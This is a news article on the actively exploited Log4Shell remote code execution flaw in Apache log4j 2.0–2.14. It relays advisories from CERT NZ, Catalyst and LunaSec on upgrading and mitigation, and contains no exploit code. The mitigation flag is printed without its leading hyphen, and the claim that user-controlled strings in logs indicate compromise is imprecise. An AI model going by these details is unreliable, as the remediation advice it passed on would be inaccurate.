The widely-used java logging library, log4j, has been actively exploited, according to an update from CERT NZ and Catalyst.
The software is said to currently have an unauthenticated RCE vulnerability if a user-controlled string is logged. This could therefore allow the attacker complete control of the affected server and access to critical data.
Users have reported that the system is being actively exploited in the wild, and that proof-of-concept code has been published.
Currently, CERT NZ says systems and services that use the Java logging library, Apache log4j between versions 2.0 and 2.14 are affected. This includes many applications and services written in Java, covering a large span and multiple entry points.
If any of these files between versions 2.0 and 2.14 are vulnerable, there is a perceived risk. If the log files for any services using affected log4j versions contain user-controlled strings, this will indicate a compromise.
CERT NZ says that the best way to prevent damage is to upgrade your log4j versions to log4j-2.15.0.
If the breach occurs, their best mitigation strategy advice is to change the setting log4j2.formatMsgNoLookups to true by adding: "Dlog4j2.formatMsgNoLookups=True" to the JVM command for starting your application.
Catalyst states that they were not aware of any of its systems or host-based systems having been compromised at the time of the advisory alert.
"We have prioritised client systems according to their criticality and risk, and are patching them to mitigate the potential for the exploit," the company says.
They have also advised that current security measures in place are helping to prevent damage and additional risk.
"Systems behind WAFs (Web Application Firewalls), like those provided by Cloudflare and Fastly, are also implementing mitigations."
Security platform LunaSec has released an update on their blog categorising it as a severe vulnerability.
'Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short," They say.
Many services have already been found to be vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be at risk. LunaSec says that even "simply changing an iPhone's name has been shown to trigger the vulnerability in Apple's servers."
They also say similar vulnerabilities have been exploited before in breaches like the 2017 Equifax data breach.
CERT NZ, Catalyst, LunaSec, and many other reporting agencies continue to issue advice and track the problem.